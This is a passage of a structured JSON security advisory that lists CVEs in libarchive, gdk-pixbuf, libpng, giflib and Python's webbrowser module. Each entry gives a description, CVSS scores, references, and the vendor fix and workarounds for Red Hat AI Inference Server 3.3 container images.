"release_date": "2026-03-20T15:08:32.576000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-5121",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-30T07:40:25.358335+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452945"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: An integer overflow flaw in `libarchive` on 32-bit systems can lead to a heap buffer overflow. This vulnerability occurs when processing a specially crafted ISO9660 image, allowing an attacker to potentially execute arbitrary code. Red Hat Enterprise Linux 64-bit systems are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "RHBZ#2452945",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc",
"url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2934",
"url": "https://github.com/libarchive/libarchive/pull/2934"
}
],
"release_date": "2026-03-30T07:44:15.222000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid processing untrusted ISO9660 images with applications that utilize `libarchive`. Users should only extract or read content from ISO images obtained from trusted sources.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing"
},
{
"acknowledgments": [
{
"names": [
"Ka\u011fan \u00c7apar"
]
}
],
"cve": "CVE-2026-5201",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2026-03-31T07:17:23.696000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An Important heap-based buffer overflow flaw exists in the `gdk-pixbuf` library\u0027s JPEG image loader. This vulnerability can be triggered automatically without user interaction when processing a specially crafted JPEG image, such as during thumbnail generation. Successful exploitation leads to application crashes and denial-of-service conditions in applications utilizing `gdk-pixbuf` for image handling.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "RHBZ#2453291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5201",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5201"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304",
"url": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304"
}
],
"release_date": "2026-03-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To reduce the risk of exploitation, avoid opening or processing untrusted JPEG image files. This operational control helps prevent the automatic triggering of the vulnerability, for example, during thumbnail generation, which could otherwise lead to application instability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image"
},
{
"cve": "CVE-2026-22695",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-01-13T00:08:52.403246+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428825"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libpng, a reference library for processing PNG (Portable Network Graphics) image files. A local attacker could exploit a heap buffer over-read vulnerability in the `png_image_finish_read` function by tricking a user into processing a specially crafted interlaced 16-bit PNG file with an 8-bit output format and non-minimal row stride. This could lead to a denial of service (DoS) and potentially information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libpng: libpng: Denial of service and information disclosure via heap buffer over-read in png_image_finish_read",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat products. A heap buffer over-read flaw exists in the libpng library when processing specially crafted interlaced 16-bit PNG images with 8-bit output format and non-minimal row stride. This issue requires user interaction, as an attacker would need to trick a user into opening a malicious PNG file.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22695"
},
{
"category": "external",
"summary": "RHBZ#2428825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428825"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22695",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22695"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22695",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22695"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea",
"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2",
"url": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/issues/778",
"url": "https://github.com/pnggroup/libpng/issues/778"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp",
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp"
}
],
"release_date": "2026-01-12T22:55:40.204000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this issue, users should avoid opening untrusted PNG image files. Applications that process PNG images should be configured to restrict processing of untrusted or unverified content where possible.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libpng: libpng: Denial of service and information disclosure via heap buffer over-read in png_image_finish_read"
},
{
"cve": "CVE-2026-22801",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-01-13T00:08:42.581146+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428824"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libpng, a reference library for PNG (Portable Network Graphics) raster image files. An integer truncation vulnerability exists in the png_write_image_16bit and png_write_image_8bit simplified write API functions. A local attacker could exploit this flaw by providing a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes, leading to a heap buffer over-read. This can result in information disclosure or a denial of service (DoS) to the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libpng: libpng: Information disclosure and denial of service via integer truncation in simplified write API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat products. An integer truncation flaw in the libpng simplified write API functions (`png_write_image_16bit`, `png_write_image_8bit`) can lead to a heap buffer over-read. Exploitation requires an application to process specially crafted input that provides a negative row stride or a stride exceeding 65535 bytes, potentially resulting in denial of service or information disclosure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22801"
},
{
"category": "external",
"summary": "RHBZ#2428824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428824"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22801",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22801"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8",
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8"
}
],
"release_date": "2026-01-12T22:57:58.288000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libpng: libpng: Information disclosure and denial of service via integer truncation in simplified write API"
},
{
"cve": "CVE-2026-23868",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-03-10T20:01:10.215637+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "giflib: Giflib: Double-free vulnerability leading to memory corruption",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "RHBZ#2446207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23868",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23868"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7",
"url": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7"
},
{
"category": "external",
"summary": "https://www.facebook.com/security/advisories/cve-2026-23868",
"url": "https://www.facebook.com/security/advisories/cve-2026-23868"
}
],
"release_date": "2026-03-10T18:53:25.606000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
